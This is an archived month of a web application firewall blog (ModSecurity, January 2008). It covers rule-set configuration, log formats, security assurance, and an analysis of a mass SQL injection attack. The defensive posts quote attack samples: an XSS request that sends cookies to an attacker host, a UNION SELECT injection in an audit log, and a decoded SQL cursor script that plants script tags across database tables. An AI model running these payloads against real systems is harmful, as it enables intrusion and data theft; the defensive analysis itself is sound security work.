ModSecurity Trustwave
This blog has moved! Please update your
bookmarks to

ModSecurity Blog: January 2008

ModSecurity 2.5 Status

The ModSecurity 2.5 release is scheduled for early/mid February.  With the ModSecurity 2.5 release just around the bend, I have been spending my time doing a lot of testing, tweaking and polishing.  I would like ModSecurity 2.5 and the core rule set (or any of the commercial rule sets Breach offers) to be easier to integrate into your environment.  Ofer Shezaf and Avi Aminov are hard at work developing and tuning the core rule sets.  Along with this comes requests from them for features to make integration and configuration easier. Because of this, I have included a few new features in ModSecurity 2.5 to make things easier for rule set authors.  What this means is that it is time for the next release candidate of ModSecurity 2.5, 2.5.0-rc2.  This release focuses primarily on making generic rule sets (such as the core rule set) easier to configure and customize for your sites.

Taming the Rule Set

ModSecurity does not give you much without a good rule set.  However, good rule sets are time consuming to develop and require a lot of testing and tuning.  More people benefit from a generic rule set, but these can be time consuming to customize for your sites while still allowing an easy upgrade path when new rule sets are released.  For those of you who keep track of the community mailing list, you have undoubtedly seen the many false positive comments and requests for help getting generic rules to fit in a custom environment.  A generic rule set will not work for everyone out of the box and will need to be tailored to fit.  But tailoring can mean local modifications.  And that may mean a lot of extra time spent retesting and reapplying modifications when it comes time to upgrade the rule set.  Ryan Barnett has some excellent articles on how to deal with modifying a rule set in the least intrusive manner.  However, I want to introduce some new functionality I have added to ModSecurity 2.5 to help deal with customizing rule sets without actually touching the rules -- making upgrades easier and require less time.

One of the biggest concerns over a generic third party rule set is that of policy.  To block or not to block, that is the question.  Some installers preferred just logging, others blocking via HTTP 403, some via HTTP 500, others preferred dropping the connection altogether with a TCP reset.  In past versions of ModSecurity, this usually meant rule set authors had to include two versions of their rules, one for logging only and another for blocking.  If this was not done, then the  rule set installer would have to manually change all the actions in a rule set if not to the installer's liking.  With ModSecurity 2.5, this blocking decision can now more easily be that of the rule set installer instead of the rule set author.

A new "block" action has been added to ModSecurity 2.5 to allow a rule set to specify where blocking is intended, but not actually specifying how to perform the blocking.  The how is left up to the rule set installer, including the choice of not blocking at all.  Currently this is done via inheritance (existing SecDefaultAction directive), but is also enhanced via the new SecRuleUpdateActionById directive.  Future versions of ModSecurity will make this even more flexible.

Take the following rule set as an example.  This will deny and log any request not a GET, POST or HEAD.  So, things like PUT, TRACE, etc. will be denied with an HTTP 500 status even though the installer specified a default of "pass".

# Default set in the local config
SecDefaultAction "phase:2,pass,log,auditlog"

# In a 3rd party rule set
SecRule REQUEST_METHOD "!^(?:GET|POST|HEAD)$" "phase:1,t:none,deny,status:500"

With the new "block" action, this could be rewritten as in the following example.  In this example the blocking action is, well, not to block ("pass" specified in the SecDefaultAction).  This could easily be changed by the installer to "deny,status:501", "drop", "redirect:https://www.example.tld/", etc.  The important thing to note here is that the installer is making the choice, not the rule set author.

# Default set in the local config
SecDefaultAction "phase:2,pass,log,auditlog"

# In a 3rd party rule set
SecRule REQUEST_METHOD "!^(?:GET|POST|HEAD)$" "phase:1,t:none,block"

So now some of you are (or maybe should be) questioning how this new "block" action differs from just not explicitly specifying a disruptive action in the rule to begin with and just letting the inheritance work as designed.  Well, there is not really that much different at first glance.  The named action is a little bit cleaner to read, but there are really two main differences.  The first is that future versions of ModSecurity can expand on how you define and customize "block" in more detail.  The second reason lies in what "block" is doing.  It is explicitly reverting back to the default disruptive action, which leads into the next new feature.

Let me start off with another example (okay, it is the same example, but it is easy to follow).  Below, there is no way to change the disruptive action other than editing the third party rule in place or replacing the rule with a local copy.  The latter is better for maintenance, but it means keeping a local copy of the rule around which may require maintenance during a rule set upgrade.

# Default set in the local config
SecDefaultAction "phase:2,pass,log,auditlog"

# In a 3rd party rule set
SecRule REQUEST_METHOD "!^(?:GET|POST|HEAD)$" "id:1,phase:1,t:none,deny,status:500"

# Replace with a local copy of the rule
SecRuleRemoveById 1
SecRule REQUEST_METHOD "!^(?:GET|POST|HEAD)$" "id:1,phase:1,t:none,pass"

With ModSecurity 2.5, you can instead update the action to make it do something else.  This is done via the new SecRuleUpdateActionById directive.  It has the added benefit where if the third party rule set is upgraded later on (provided the id is the same, which it should be - hint) there is no editing required for the local copy of the customization.  In fact, there is no local copy to edit at all.

# Default set in the local config
SecDefaultAction "phase:2,pass,log,auditlog"

# In a 3rd party rule set
SecRule REQUEST_METHOD "!^(?:GET|POST|HEAD)$" "id:1,phase:1,t:none,deny,status:500"

# Update the default action explicitly
SecRuleUpdateActionById 1 "pass"

You should notice in the last example that what I did was to change the third party rule back to what I originally specified in the SecDefaultAction.  If only there was a way to just tell the rule to use the default.  This is where the second reason for "block" comes into play (thought I forgot about that, eh).  Instead of explicitly specifying the disruptive action, you can just specify it as "block" and it will instead force the rule to revert back to the last default action.  In this example that is a "pass".  This is just as if the rule author had specified "block" instead of "deny".

# Default set in the local config
SecDefaultAction "phase:2,pass,log,auditlog"

# In a 3rd party rule set
SecRule REQUEST_METHOD "!^(?:GET|POST|HEAD)$" "id:1,phase:1,t:none,deny,status:500"

# Revert the rule back to the default disruptive action, "pass"
SecRuleUpdateActionById 1 "block"

The new SecRuleUpdateActionById directive is not limited to only disruptive actions.  You can update nearly any action.  The only imposed limit is that you may not change the ID of a rule.  However, some care should be taken for actions that are additive (transformations, ctl, setvar, etc.) as these actions are not replaced, but appended to.  For transformations, however, you can "replace" the entire transformation chain by specifying "t:none" as the first transformation in the update (just as you would when inheriting from SecDefaultAction).

New Build Method and Automated Tests

Another big change in this release is the build process.  ModSecurity 2.5 is now built with a more automated method.  No more editing a Makefile.  Instead, a configure script was added to automate the creation of a Makefile by searching for the location of all dependencies.  Additionally, I added a number of automated tests to ensure operators and transformations are working as expected (executed via "make test").

# Typical build proceedure is now:
make test
sudo make install

Other Notable Changes in this Release

There are a few other minor additions and changes in this second release candidate as well.

  • The mlogc tool is now included with the ModSecurity 2.5 source.
  • To help reduce assumptions, the default action is now a minimal "phase:2,log,pass" with no default transformations performed.
  • A new SecUploadFileMode directive is available to explicitly set the file permissions for uploaded files.  This allows easier integration with external analysis software (virus checkers, etc.).
  • To help reduce the risk of logging sensitive data, the query string is no longer logged in the error log.
  • Miscellaneous fixes for removing rules via SecRuleRemoveBy* directives.

How You Can Help

As you can see there are a lot of new features and enhancements in ModSecurity 2.5.  I hope to see some good feedback from the release candidates so that we can get ModSecurity 2.5 polished up and the stable 2.5.0 available as soon as possible.  Installing and testing in your environment is a great help, but there are other ways you can help.

  • Read through and give suggestions for improvements to the documentation.
  • Run through the new build/install procedure and give suggestions on how it can be improved.
  • Tell us how you are using ModSecurity and where your biggest challenges are and where you might be hitting limitations.

Getting ModSecurity

As always, send questions/comments to the community support mailing list.  You can download the latest releases, view the documentation and subscribe to the mailing list at

Is Your Website Secure? Prove It.

The recent compromise and subsequent articles have created a perfect storm of discussion topics and concerns related to web security. The underlying theme is that true web security encompasses much more than a Nessus scan from an external company.

The concepts (and much of the text) in this post are taken directly from a blog post by Richard Bejtlich on his TaoSecurity site. I have simply tailored the concepts specifically to web security. Thanks goes to Richard for always posting thought provoking items and making me look at web security through a different set of eyes. You know what they say about imitation ;)

The title of this post form the core of most of my recent thinking on web application security. Since I work for a commercial web application firewall company and am the ModSecurity Community Manager, I often get the chance to talk with people about web application security. While I am not a "sales" guy, I do hang out at our vendor booth when we are at conferences. I am mainly there to field technical questions and just interact with people. I have found that the title of this post is actually one of the absolute best questions to ask someone when they first come up to our booth. It always sparks interesting conversation and can shed light onto specific areas of strength and weakness.

What does it mean to be secure?

Obviously having logos posted on a web site that tout "we are secure" is really just a marketing tactic aimed to re-assure potential customer that it is safe to purchase goods at their site. The reality is that these logos are non-reliable and make no guarantee as to the real level of security offered by the web site. At best, they are an indication that the web site has met some sort of minimum standard. But that is a far cry from actually being secure.

Let me expand "secure" to mean the definition Richard provided in his first book: Security is the process of maintaining an acceptable level of perceived risk. He defined risk as the probability of suffering harm or loss. You could expand my six word question into are you operating a process that maintains an acceptable level of perceived risk for your web application?

Let's review some of the answers you might hear to this question. I'll give an opinion regarding the utility of the answer as well. For the purpose of this exercise let's assume it is possible to answer "yes" to this question. In other words, we just don't answer "no." We could all make arguments as to why it's impossible to be secure, but does that really mean there is no acceptable level of perceived risk in which you could operate? I doubt it. Let's take a look at the varios levels of responses.

So, is your website secure? Prove it.

1. Yes.

Then, crickets (i.e., silence for you non-imaginative folks.) This is completely unacceptable. The failure to provide any kind of proof is security by belief. We want security by fact. Think of it this way, would auditors accept this answer? Could you pass a PCI Audit by simply responding yeah, we are secure. Nope, you need to provide evidence.

2. Yes, we have product X, Y, Z, etc. deployed.

This is better, but it's another expression of belief and not fact. The only fact here is that technologies can be abused, subverted, and broken. Technologies can be simultaneously effective against one attack model and completely worthless against another.

This also reminds me of another common response I hear and that is - yes, we are secure because we use SSL. Ugh... Let me share with you one personal experience that I had with an "SSL Secured" website. Awhile back, I decided to make an online purchase of some herbal packs that can be heated in the microwave and used to treat sore muscles. When I visited the manufacturer's web site, I was dutifully greeted with a message "We are a secure web site! We use 128-bit SSL Encryption." This was reassuring as I obviously did not want to send my credit card number to them in clear text. During my checkout process, I decided to verify some general SSL info about the connection. I double-clicked on the "lock" in the lower-right hand corner of my web browser and verified that the domain name associated with the SSL certificate matched the URL domain that I was visiting, that it was signed by a reputable Certificate Authority such as VeriSign, and, finally, that the certificate was still valid. Everything seemed in order so I proceeded with the checkout process and entered my credit card data. I hit the submit button and was then presented with a message that made my stomach tighten up. The message is displayed next; however, I have edited some of the information to obscure both the company and my credit card data.

The following email message was sent:
name: Ryan Barnett
address: 1234 Someplace Ct.
city: Someplace
state: State
zip: 12345
Type of card: American Express
name on card: Ryan Barnett
card number: 123456789012345
expiration date: 11/05
number of basics:
Number of eyepillows:
Number of neckrings: 1
number of belted: 1
number of jumbo packs:
number of foot warmers: 1
number of knee wraps:
number of wrist wraps:
number of keyboard packs:
number of shoulder wrap-s:
number of cool downz:
number of hats-black:         number of hats-gray:
number of hats-navy:         number of hats-red:
number of hats-rtcamo:         number of hats-orange:
do you want it shipped to a friend:
their address:
their city:
their state:
their zip:
cgiemail 1.6

I could not believe it. It looked as though they had sent out my credit card data in clear-text to an AOL email account. How could this be? They were obviously technically savvy enough to understand the need to use SSL encryption when clients submitted their data to their web site. How could they then not provide the same due diligence on the back-end of the process?

I was hoping that I was somehow mistaken. I saw a banner message at the end of the screen that indicated that the application used to process this order was called "cgiemail 1.6." I therefore hopped on Google and tried to track down the details of this application. I found a hit in Google that linked to the cgiemail webmaster guide. I quickly reviewed the contents and found what I was looking for in the "What security issues are there?" section:

Interception of network data sent from browser to server or vice versa via network eavesdropping. Eavesdroppers can operate from any point on the pathway between browser and server.

Risk: With cgiemail as with any form-to-mail program, eavesdroppers can also operate on any point on the pathway between the web server and the end reader of the mail. Since there is no encryption built into cgiemail, it is not recommended for confidential information such as credit card numbers.

Shoot, just as I suspected. I then spent the rest of the day contacting my credit card company about possible information disclosure and to place a watch on my account. I also contacted the company by sending an email to the same AOL address outlining the security issues that they needed to deal with. To summarize this story: Use of SSL does not a "secure site" make.

3. Yes, we are PCI compliant.

Generally speaking, regulatory compliance is usually a check-box paperwork exercise whose controls lag attack models of the day by one to five years, if not more. PCI is somewhat of an exception as it attempts to be more operationally relevant and address more current web application security issues. While there are some admirable aspects of PCI, please keep this mantra in mind -

It is much easier to pass a PCI audit if you are secure than to be secure because you pass a PCI audit.

PCI, like most other regulations, are a minimum standard of due care and passing the audit does make your site "unhackable." A compliant enterprise is like feeling an ocean liner is secure because it left dry dock with life boats and jackets. If regulatory compliance is more than a paperwork self-survey, we approach the realm of real of evidence. However, I have not seen any compliance assessments which measure anything of operational relevance. Check out Richard's Blog posts on Control-Compliant security for more details on this concept and why it is inadequate. What we really need is more of a "Field-Assessed" mode of evaluation. I will discuss this concept more in depth in future Blog posts.

4. Yes, we have logs indicating we prevented web attacks X, Y, and Z (SQL Injection, XSS, etc...).

This is getting close to the right answer, but it's still inadequate. For the first time we have some real evidence (logs) but these will probably not provide the whole picture. I believe that how people deploy and use a WAF is critical. Most people deploy a WAF in an "alert-centric" configuration which will only provide logs when a rule matches. Sure, these alert logs indicate what was identified and potentially stopped, but what about activities that were allowed? Were they all normal, or were some malicious but unrecognized by the preventative mechanism? Deploying a WAF as an HTTP level auditing device is a highly under-utilized deployment option. There is a great old quote that sums up this concept -

"In an incident, if you don't have good logs (i.e. auditing), you'd better have good luck."

5. Yes, we do not have any indications that our web applications are acting outside their expected usage patterns.

Some would call this rationale the definition of security. Whether or not this answer is acceptable depends on the nature of the indications. If you have no indications because you are not monitoring anything, then this excuse is hollow. If you have no indications and you comprehensively track the state of a web application, then we are making real progress. That leads to the penultimate answer, which is very close to ideal.

6. Yes, we do not have any indications that our web applications are acting outside their expected usage patterns, and we thoroughly collect, analyze, and escalate a variety of network-, host-, and web application-based evidence for signs of violations.

This is really close to the correct answer. The absence of indications of intrusion is only significant if you have some assurance that you've properly instrumented and understood the web application. You must have trustworthy monitoring systems in order to trust that a web application is "secure." The lack of robust audit logs is usually the reason why organizations can not provide this answer. Put it this way, Common Log Format (CLF) logs are not adequate for full web based incident responst. Too much data is missing. If this is really close, why isn't it correct?

7. Yes, we do not have any indications that our web applications are acting outside their expected usage patterns, and we thoroughly collect, analyze, and escalate a variety of network-, host-, and web application-based evidence for signs of violations. We regularly test our detection and response people, processes, and tools against external adversary simulations that match or exceed the capabilities and intentions of the parties attacking our enterprise (i.e., the threat).

Here you see the reason why number 6 was insufficient. If you assumed that number 6 was OK, you forgot to ensure that your operations were up to the task of detecting and responding to intrusions. Periodically you must benchmark your perceived effectiveness against a neutral third party in an operational exercise (a "red team" event). A final assumption inherent in all seven answers is that you know the assets you are trying to secure, which is no mean feat. Think of this practical exercise, if you run a zero-knowledge (meaning un-announced to operations staff) web application penetration test, how does your organization respond? Do they even notice the penetration attempts? Do they report it through the proper escalation procedures? How long does it take before additional preventative measures are employed? Without answers to this type of "live" simulation, you will never truly know if your monitoring and defensive mechanisms are working.


Indirectly, this post also explains why only doing one of the following: web vulnerability scanning, penetration testing, deploying a web application firewall and log analysis does not adequately ensure "security." While each of these tasks excel in some areas and aid in the overall security of a website, they are each also ineffective in other areas. It is the overall coordination of these efforts that will provide organizations with, as Richard would say, a truly "defensible web application."

Content Injection Use Case Example

ModSecurity 2.5 introduces a really cool, yet somewhat obscure feature called Content Injection. The concept is pretty interesting as it allows you to inject any text data that you want into the response bodies of your web application.

Identifying Real IP Addresses of Web Attackers

One of the biggest challenges of doing incident response during web attacks is to try and trace back the source IP address information to identify the "real" attacker's computer. The reason why this is so challenging is that attackers almost always loop their attacks through numerous open proxy servers or other compromised hosts where they setup connection tunnels. This means that the actual IP address that shows up in the victims logs is most likely only the last hop in between the attacker and the target site. One way to try and tackle this problem is instead of relying on the TCP-IP address information of the connection, we attempt to handle this at the HTTP layer.

Web security researches (such as Jeremiah Grossman) have conducted quite a bit research in area of how blackhats can send malicious javascript/java to clients. Once the code executes, it can obtain the client's real (internal NAT) IP address. With this information, the javascript code can do all sorts of interesting stuff such as port scan the internal network. In our scenario, the client is not an innocent victim but instead a malicious client who is attacking our site. The idea is that this code that we send to the client will execute locally, grab their real IP address and then post the data back to a URL location on our site. With this data, we can then perhaps initiate a brand new incident response engagement focusing in on the actual origin of the attacks!

The following rule uses the same data as the previous example, except this time, instead of simply sending an alert pop-up box we are sending the MyAddress.class java applet. This code will force the attacker's browser to initiate a connection back to our web server.

SecRule TX:ALERT "@eq 1" "phase:3,nolog,pass,chain,prepend:'<APPLET CODE=\"MyAddress.class\" MAYSCRIPT WIDTH=0 HEIGHT=0>
<PARAM NAME=\"URL\" VALUE=\"grab_ip.php?IP=\">
SecRule RESPONSE_CONTENT_TYPE "^text/html"

So, if an attacker sends a malicious request that ModSecurity triggers on, this rule will then fire and it will send the injected code to the client. Our Apache access_logs will show data similar to this: - - [20/Jan/2008:21:15:03 -0500] "GET /cgi-bin/foo.cgi?param=<script>document.write('<img%20
src="https://hackersite/'+document.cookie+'"')</script> HTTP/1.1" 500 676 - - [20/Jan/2008:21:15:03 -0500] "GET /cgi-bin/grab_ip.php?IP= HTTP/1.1" 404 207

As you can see, even though the IP address in the access_logs shows, the data returned in the QUERY_STRING portion of the second line shows that the real IP address of the attacker is This would mean that in this case, the attacker's system was not on a private network (perhaps just connecting their computer directly to the internet). In this case, you would be able to obtain the actual IP of an attacker who was conducting a manual attack with a browser.

Attacker -> Proxy -> ... -> Proxy -> Target Website.
    ^                         ^ 


Internal LAN

This example is extremely experimental. As the previous section indicates, if the attacker were behind a router (on a private LAN) then the address range would have probably been in the range.

Attacker -> Firewall/Router -> ... -> Proxy -> Target Website.
    ^                                   ^            

This type of data would not be as useful for our purposes as it wouldn't help for a traceback.

Non-Browser Clients

Since a majority of web attacks are automated, odds are that the application that is sending the exploit payload is not actually a browser but rather some sort of scripting client. This would mean that the javascript/java code would not actually execute.


Hopefully you can now see the potential power of the content injection capability in ModSecurity. The goal of this post was to get you thinking about the possibilities. For other ideas on the interesting types of javascript that we could inject, check out PDP's AttackAPI Atom database. ModSecurity will eventually expand this functionality to allow for injecting content at specific locations of a response body instead of just at the beginnin or at the end.

Yes, the Tide for Web Application Firewalls is Turning

Some time ago I decided to start a new blog, a place where I would be able to address the topics that are not ModSecurity specific. I felt the ModSecurity Blog has its purpose and a happy audience; I didn't want for it to lose the focus. Today I made my first proper post at this new blog:

There is a long-running tradition in the web application firewall space; every year we say: "This year is going to be the one when web application firewalls take off!" So far, every year turned out to be a bit of a disappointment in this respect. This year feels different, and I am not saying this because it's a tradition to do so. Recent months have seen a steady and significant rise in the interest in and the recognition of web application firewalls. But why is it taking so long?

To read more please continue to "Tide is turning for web application firewalls".

ModSecurity Data Formats

I have just added a new section to the ModSecurity v2.5 Reference Manual, describing the data formats we use. Nothing spectacular, I know, but it is always nice when things get written down.


Below is an example of a ModSecurity alert entry. It is always contained on a single line but we've broken it here into multiple lines for readability.

Access denied with code 505 (phase 1). Match of "rx ^HTTP/(0\\\\.9|1\\\\.[01])$"
against "REQUEST_PROTOCOL" required. [id "960034"] [msg "HTTP protocol version
is not allowed by policy"] [severity "CRITICAL"] [uri "/"] [unique_id

Each alert entry begins with the engine message:

Access denied with code 505 (phase 1). Match of "rx ^HTTP/(0\\\\.9|1\\\\.[01])$"
against "REQUEST_PROTOCOL" required.

The engine message consists of two parts. The first part tells you whether ModSecurity acted to interrupt transaction or rule processing. If it did nothing the first part of the message will simply say "Warning". If an action was taken then one of the following messages will be used:

  • Access denied with code %0 - a response with status code %0 was sent.
  • Access denied with connection close - connection was abruptly closed.
  • Access denied with redirection to %0 using status %1 - a redirection to URI %0 was issued using status %1.
  • Access allowed - rule engine stopped processing rules (transaction was unaffected).
  • Access to phase allowed - rule engine stopped processing rules in the current phase only. Subsequent phases will be processed normally. Transaction was not affected by this rule but it may be affected by any of the rules in the subsequent phase.
  • Access to request allowed - rule engine stopped processing rules in the current phase. Phases prior to request execution in the backend (currently phases 1 and 2) will not be processed. The response phases (currently phases 3 and 4) and others (currently phase 5) will be processed as normal. Transaction was not affected by this rule but it may be affected by any of the rules in the subsequent phase.

The second part of the engine message explains why the event was generated. Since it is automatically generated from the rules it will be very technical in nature talking about operators and their parameters and give you insight into what the rule looked like. But this message cannot give you insight into the reasoning behind the rule. A well-written rule will always specify a human-readable message (using the msg action) to provide further clarification.
The metadata fields are always placed at the end of the alert entry. Each metadata field is a text fragment that consists of an open bracket followed by the metadata field name, followed by the value and the closing bracket. What follows is the text fragment that makes up the id metadata field.

[id "960034"]

The following metadata fields are currently used:

  1. id - Unique rule ID, as specified by the id action.
  2. rev - Rule revision, as specified by the rev action.
  3. msg - Human-readable message, as specified by the msg action.
  4. severity - Event severity, as specified by the severity action.
  5. unique_id - Unique event ID, generated automatically.
  6. uri - Request URI.
  7. logdata - contains transaction data fragment, as specified by the logdata action.

Alerts in Apache

Every ModSecurity alert conforms to the following format when it appears in the Apache error log:

[Sun Jun 24 10:19:58 2007] [error] [client] ModSecurity: ALERT_MESSAGE

The above is a standard Apache error log format. The "ModSecurity:" prefix is specific to ModSecurity. It is used to allow quick identification of ModSecurity alert messages when they appear in the same file next to other Apache messages.
The actual message (ALERT_MESSAGE in the example above) is in the same format as described in the Alerts section.

Alerts in Audit Log

Alerts are transported in the H section of the ModSecurity Audit Log. Alerts will appear each on a separate line and in the order they were generated by ModSecurity. Each line will be in the following format:


Below is an example of an entire H section (followed by the Z section terminator):

Message: Warning. Match of "rx ^apache.*perl" against "REQUEST_HEADERS:User-Agent" required. [id "990011"]
 [msg "Request Indicates an automated program explored the site"] [severity "NOTICE"]
Message: Warning. Pattern match "(?:\\b(?:(?:s(?:elect\\b(?:.{1,100}?\\b(?:(?:length|count|top)\\b.{1,100}
 (?:(?:addextendedpro|sqlexe)c|(?:oacreat|prepar)e|execute(?:sql)?|makewebt ..." at ARGS:c. [id "950001"]
 [msg "SQL Injection Attack. Matched signature: union select"] [severity "CRITICAL"]
Stopwatch: 1199881676978327 2514 (396 2224 -)
Producer: ModSecurity v2.x.x (Apache 2.x)
Server: Apache/2.x.x

Audit Log

ModSecurity records one transaction in a single audit log file. Below is an example:

[09/Jan/2008:12:27:56 +0000] OSD4l1BEUOkAAHZ8Y3QAAAAH 64995 80
GET //EvilBoard_0.1a/index.php?c='/**/union/**/select/**/1,concat(username,char(77),
TE: deflate,gzip;q=0.3
Connection: TE, close
User-Agent: libwww-perl/5.808
HTTP/1.1 404 Not Found
Content-Length: 223
Connection: close
Content-Type: text/html; charset=iso-8859-1
Message: Warning. Match of "rx ^apache.*perl" against "REQUEST_HEADERS:User-Agent" required. [id "990011"]
 [msg "Request Indicates an automated program explored the site"] [severity "NOTICE"]
Message: Warning. Pattern match "(?:\\b(?:(?:s(?:elect\\b(?:.{1,100}?\\b(?:(?:length|count|top)\\b.{1,100}
 (?:(?:addextendedpro|sqlexe)c|(?:oacreat|prepar)e|execute(?:sql)?|makewebt ..." at ARGS:c. [id "950001"]
 [msg "SQL Injection Attack. Matched signature: union select"] [severity "CRITICAL"]
Apache-Error: [file "/tmp/buildd/apache2-2.x.x/build-tree/apache2/server/core.c"] [line 3505] [level 3]
 File does not exist: /var/www/EvilBoard_0.1a
Stopwatch: 1199881676978327 2514 (396 2224 -)
Producer: ModSecurity v2.x.x (Apache 2.x)
Server: Apache/2.x.x

The file consist of multiple sections, each in different format. Separators are used to define sections:


A separator always begins on a new line and conforms to the following format:

  1. Two dashes at the beginning.
  2. Unique boundary, which consists from several hexadecimal characters.
  3. One dash character.
  4. Section identifier, currently a single uppercase letter.
  5. Two trailing dashes at the end.

Refer to the documentation for SecAuditLogParts for the explanation of each part.

Speaking About ModSecurity at ApacheCon Europe 2008

I will be speaking about ModSecurity at ApacheCon Europe in Amsterdam later this year. I hear ApacheCon Europe 2007 (also in Amsterdam) was great so I am looking forward to participating this year. Interestingly, for some reason or another, this will be the first time ModSecurity will be "officially" presented to the Apache crowd, in spite of the fact we've been going at it for years. As always, the best part is meeting the people you've been communicating with for years.

"Intrusion detection is a well-known network security technique -- it introduces monitoring and correlation devices to networks, enabling administrators to monitor events and detect attacks and anomalies in real-time. Web intrusion detection does the same but it works on the HTTP level, making it suitable to deal with security issues in web applications. This session will start with an overview of web intrusion detection and web application firewalls, discussing where they belong in the overall protection strategy. The second part of the talk will discuss ModSecurity and its capabilities. ModSecurity is an open source web application firewall that can be deployed either embedded (in the Apache HTTP server) or as a network gateway (as part of a reverse proxy deployment). Now in its fifth year of development, ModSecurity is mature, robust and flexible. Due to its popularity and wide usage it is now positioned as a de-facto standard in the web intrusion detection space."

SQL Injection Attack Infects Thousands of Websites

Here is a snippet from the just released SANS NewsBites letter:

"TOP OF THE NEWS --SQL Injection Attack Infects Thousands of Websites (January 7 & 8, 2008) At least 70,000 websites have fallen prey to an automated SQL injection attack that exploits several vulnerabilities, including the Microsoft Data Access Components (MDAC) flaw that Microsoft patched in April 2006. Users have been redirected to another domain [u c 8 0 1 0 . c o m], that attempted to infect users' computers with keystroke loggers. Many of the sites have since been scrubbed. The attack is similar to one launched last year against the Miami Dolphins' Stadium website just prior to the Super Bowl."

Additional coverage is available from several places:

So, there is a new, nasty bot on the loose that is targeting websites that use IIS/MS-SQL DB. It is exploiting non-specific SQL Injection vulnerabilities that exist in websites to inject malicious JavaScript into all fields. Once it gets the victims to the web site it will try and exploit various known browser and plugin vulnerabilities. Essentially, the attack inserts <script src=https://?></script> into all varchar and text fields in your SQL database.

While there has been much focus on the goal of the attack -- which is to try and exploit some browser (client) vulnerabilities to perhaps install some trojans or other malware -- not as much attention has been paid to actual attack vector that lead to the compromise: the SQL injection attack itself.

Here is an example IIS log entry of the SQL Injection attack that was posted to a user forum:

2007-12-30 18:22:46 POST /crappyoutsourcedCMS.asp;DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST
C00400043002000′. - HTTP/1.0 Mozilla/3.0+(compatible;+Indy+Library)
- 500 15248

If you decode the CAST values, here is the actual SQL that is being injected:

DECLARE @T varchar(255),@C varchar(255) DECLARE Table_Cursor CURSOR FOR select, 
from sysobjects a,syscolumns b where and a.xtype='u' and (b.xtype=99 or b.xtype=35
or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM  Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+'
]))+''<script src=></script>''')FETCH NEXT FROM 
Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor DECLARE @T

Mitigation Options

There are many remediation steps that can and should be taken.

Immediate Fix: Use ModSecurity and the Core Rules

If these web sites were front-ended by an Apache reverse proxy server (with ModSecurity and the Core Rules) then the back-end IIS/MS SQL application servers would have been protected against this attack. The free Core Rules, which are available for download from the the ModSecurity web site, include SQL injection rules that would have identified and blocked this specific automated attack. Specifically, Rule ID 950001 in the modsecurity_crs_40_generic_attacks.conf file would have triggered on the "cast(" portion of the SQL injection string.

Mid-Term/Long-Term Fix: Correct the Code

Web developers should identify and correct any Input Validation errors in their code, and make sure the SQL queries are sent to the database in a safe manner (which typically translates to using binding to pass parameters).

Set-based Pattern Matching Example

Large Wordlist Example

You will find the greatest benefit of using the set based matching opertors when you have a requirement to look for an extremely large word list in the variable data. A perfect example of this is if you want to search request content for the presence of SPAM keywords or references to known SPAM hosting locations. The GotRoot rule set includes a rule file called blacklist.conf that includes rules that look similar following and has a approximately 7600 individual rules:

SecRule HTTP_Referer|ARGS "best-deals-blackjack\.info"
SecRule HTTP_Referer|ARGS "best-deals-casino\.info"
SecRule HTTP_Referer|ARGS "best-deals-cheap-airline-tickets\.info"
SecRule HTTP_Referer|ARGS "best-deals-diet\.info"
SecRule HTTP_Referer|ARGS "best-deals-flowers\.info"
SecRule HTTP_Referer|ARGS "best-deals-hotels\.info"
SecRule HTTP_Referer|ARGS "best-deals-online-gambling\.info"
SecRule HTTP_Referer|ARGS "best-deals-online-poker\.info"
SecRule HTTP_Referer|ARGS "best-deals-poker\.info"
SecRule HTTP_Referer|ARGS "best-deals-roulette\.info"
SecRule HTTP_Referer|ARGS "best-deals-weight-loss\.info"
SecRule HTTP_Referer|ARGS "bestdims\.com"
SecRule HTTP_Referer|ARGS "bestdvdclubs\.com"
SecRule HTTP_Referer|ARGS "best-e-site\.com"
SecRule HTTP_Referer|ARGS "best-gambling\.biz"
SecRule HTTP_Referer|ARGS "bestgamblinghouseonline\.com"

Let's see the average time that it takes ModSecurity to run through all of these individual rules in phase:2.

# head -3 /usr/local/apache/logs/modsec_debug.log
[20/Jan/2008:02:45:49 --0500] [][rid#9f9dab8][/cgi-bin/foo.cgi][1] Phase 1: 18 usec
[20/Jan/2008:02:45:49 --0500] [][rid#9f9dab8][/cgi-bin/foo.cgi][1] Rule 918e140 [id "-"][file "/usr/local/apache/conf/rules/modsecurity_crs_10_config.conf"][line "86"]: 10 usec
[20/Jan/2008:02:59:47 --0500] [][rid#9f9dab8][/cgi-bin/foo.cgi][1] Phase 2: 83751 usec

So, it took 83751 usec to process the ~7600 individual rules. Now, lets run a similar test however this time, we will use the @pmFromFile operator and the input file will have approximately the same number of text lines. Instead of having thousands of individual SecRule lines, I will use this one line:

SecRule REQUEST_HEADERS:Referer|ARGS "@pmFromFile spam_domains.txt"

The spam_domains.txt file contains approximately 6900 lines such as these:

When I run the same test with this new rule that uses the @pmFromFile operator, you can see the dramatic difference in processing time:

# head -4 /usr/local/apache/logs/modsec_debug.log
[20/Jan/2008:03:20:45 --0500] [webapphoneypot/sid#8971f48][rid#923bf58][/cgi-bin/foo.cgi][1] Phase 1: 20 usec
[20/Jan/2008:03:20:45 --0500] [webapphoneypot/sid#8971f48][rid#923bf58][/cgi-bin/foo.cgi][1] Rule 9202980 [id "-"][file "/usr/local/apache/conf/rules/modsecurity_crs_10_config.conf"][line "86"]: 11 usec
[20/Jan/2008:03:20:45 --0500] [webapphoneypot/sid#8971f48][rid#923bf58][/cgi-bin/foo.cgi][1] Phase 2: 10 usec
[20/Jan/2008:03:20:45 --0500] [webapphoneypot/sid#8971f48][rid#923bf58][/cgi-bin/foo.cgi][1] Rule 9203890 [id "-"][file "/usr/local/apache/conf/rules/modsecurity_crs_15_customrules.conf"][line "1"]: 6 usec

As you can see, it only took 6 usec to complete the @pmFromFile set based matching operator check! That is a gigantic improvement for overall performance.


Set based pattern matching can increase the overall performance of your ModSecurity rules when used in the proper circumstances. Any situation where you need to inspect a large word list, you should try and leverage these new operators


November 2010
Sun Mon Tue Wed Thu Fri Sat
1 2 3 4 5 6
7 8 9 10 11 12 13
14 15 16 17 18 19 20
21 22 23 24 25 26 27
28 29 30


Atom Feed



Recent Entries